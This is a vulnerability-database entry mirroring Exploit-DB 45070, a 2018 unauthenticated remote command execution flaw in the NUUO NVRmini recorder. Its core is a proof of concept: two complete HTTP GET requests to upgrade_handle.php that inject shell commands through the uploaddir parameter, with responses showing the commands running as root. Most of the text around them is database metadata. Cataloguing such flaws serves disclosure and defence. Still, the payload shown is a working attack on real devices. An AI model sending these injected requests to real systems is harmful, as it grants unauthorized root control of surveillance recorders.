Details of VAR-E-201807-0173

ID

VAR-E-201807-0173

EDB ID

45070

TITLE

NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45070

DESCRIPTION

NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution.. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 45070

AFFECTED PRODUCTS

vendor:

nuuo

model:

nvrmini

scope:

version:

Trust: 1.6

sources: EXPLOIT-DB: 45070 // EDBNET: 98727

EXPLOIT

# Exploit Title: NUUO NVR Unauthenticated Remote Code Execution
# Exploit Author: Berk Dusunur
# Google Dork: N/A
# Date: 2018-07-21
# Vendor Homepage: http://www.nuuo.com/
# Software Link: http://www.nuuo.com/
# Affected Version: v2016
# Tested on: Parrot OS
# CVE : N/A

# Proof Of Concept

GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1
Host: target:50000
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en

HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.13
Content-type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Sat, 21 Jul 2018 15:54:09 GMT
Server: lighttpd/1.4.39

upload_tmp_dir=/mtd/block3 root

GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;id;%27 HTTP/1.1
Host: target:5000
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en

HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.13
Content-type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Sat, 21 Jul 2018 15:54:09 GMT
Server: lighttpd/1.4.39

upload_tmp_dir=/mtd/block3 uid=0(root) gid=0(root)

Trust: 1.0

sources: EXPLOIT-DB: 45070

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 45070

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45070

TYPE

'upgrade_handle.php' Remote Command Execution

Trust: 1.6

sources: EXPLOIT-DB: 45070 // EDBNET: 98727

CREDITS

Berk Dusunur

Trust: 0.6

sources: EXPLOIT-DB: 45070

EXTERNAL IDS

db:	EXPLOIT-DB	id:	45070	Trust: 1.6
db:	EDBNET	id:	98727	Trust: 0.6

sources: EXPLOIT-DB: 45070 // EDBNET: 98727

REFERENCES

url:

https://www.exploit-db.com/exploits/45070/

Trust: 0.6

sources: EDBNET: 98727

SOURCES

db:	EXPLOIT-DB	id:	45070
db:	EDBNET	id:	98727

LAST UPDATE DATE

2022-07-27T10:00:33.020000+00:00

SOURCES RELEASE DATE

db:	EXPLOIT-DB	id:	45070	date:	2018-07-23T00:00:00
db:	EDBNET	id:	98727	date:	2018-07-28T00:00:00